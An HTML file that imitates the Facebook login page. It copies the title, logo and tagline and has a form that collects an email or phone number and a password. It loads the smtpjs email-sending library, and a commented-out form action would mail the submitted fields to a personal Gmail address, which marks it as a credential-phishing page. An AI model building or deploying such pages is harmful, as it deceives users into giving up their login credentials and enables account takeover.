<!DOCTYPE html>
<html>

<head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <link rel="stylesheet" type="text/css" href="styles.css">
  <title>Facebook-log in or sign up</title>
  <script src=
    "https://smtpjs.com/v3/smtp.js">
  </script>
</head>

<body>
  <div id="main-div">
    <img src="https://static.xx.fbcdn.net/rsrc.php/y8/r/dF5SId3UHWd.svg">
    <span id="header">Facebook helps you connect and share with the people in your life.<span>
  </div>

  <!-- <form action="https://www.facebook.com/"> -->
    <!-- <form action="mailto:raakesh95misc@gmail.com" method="post" enctype="text/plain" target="https://www.facebook.com"> -->
    <form>
    <label for="contact"></label>
    <input type="text" name="contact" id="contact" placeholder="Email address or phone number" pattern="[a-z0-9._%+-]+@[a-z0-9.-]+\.[a-z]{2,}$|^\d{10}$" required>
    <label for="password"></label>
    <input type="password" name="password" id="password" placeholder="Password" required>
    <input type="submit" value="Log in" id="button">
    <a>Forgotten password?</a>
    <div id="divider"></div>
    <button id="new-acc">Create new account</button>
    <!-- <span id="page-text"><a id="page-link">Create a Page</a> for a celebrity, brand or business.</span> -->
    </form>

    <script src="./index.js"></script>

</body>

</html>
